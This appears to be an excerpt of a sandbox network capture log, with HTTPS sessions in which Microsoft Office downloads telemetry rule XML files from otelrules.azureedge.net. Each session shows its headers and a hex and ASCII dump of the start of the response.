                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:50 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                            x-ms-request-id: 7ca1e40b-601e-003d-2f8c-3a6f25000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200550Z-r1d97b99577l6wbzhC1TEB3fwn00000009h0000000003shh
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:50 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            122192.168.2.44992013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:49 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:50 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:50 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                            x-ms-request-id: e7f96b90-101e-008e-3275-3bcf88000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200550Z-r1d97b9957744xz5hC1TEB5bf8000000097g00000000a6vr
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:50 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            123192.168.2.44991813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:49 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:50 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                            x-ms-request-id: 44a56bea-901e-0064-626a-3be8a6000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200550Z-185f5d8b95cjbkr4hC1NYCeu240000000ahg00000000p8k2
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:50 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            124192.168.2.44992213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:52 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:52 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                            x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200552Z-1777c6cb7549x5qchC1TEBggbg0000000a70000000002fm5
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:52 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            125192.168.2.44992413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:52 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:52 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                            x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200552Z-185f5d8b95c4vwv8hC1NYCy4v40000000ay0000000002cbx
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            126192.168.2.44992313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:52 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:52 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                                                            x-ms-request-id: cd6c36a4-201e-000c-237c-3b79c4000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200552Z-185f5d8b95cgrrn8hC1NYCgwh40000000ap0000000002q9h
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:52 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            127192.168.2.44992513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:52 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:52 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                            x-ms-request-id: 7bd1ae59-401e-008c-598c-3a86c2000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200552Z-185f5d8b95crwqd8hC1NYCps680000000atg0000000010ka
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:52 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            128192.168.2.44992113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:53 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:54 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:53 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                            x-ms-request-id: 57f4d0d3-201e-0033-0b7c-3bb167000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200553Z-1777c6cb754j47wfhC1TEB5wrw00000005x000000000e06q
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:54 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            129192.168.2.44992713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:54 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:54 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                            x-ms-request-id: 8222e379-801e-008f-078c-3a2c5d000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200554Z-r1d97b99577lxltfhC1TEByw2s00000009b000000000f2kz
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:54 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            130192.168.2.44992813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:54 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:54 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                            x-ms-request-id: bfe6e8fa-201e-006e-3f8c-3abbe3000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200554Z-1777c6cb754mqztshC1TEB4mkc0000000a2g00000000hu20
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
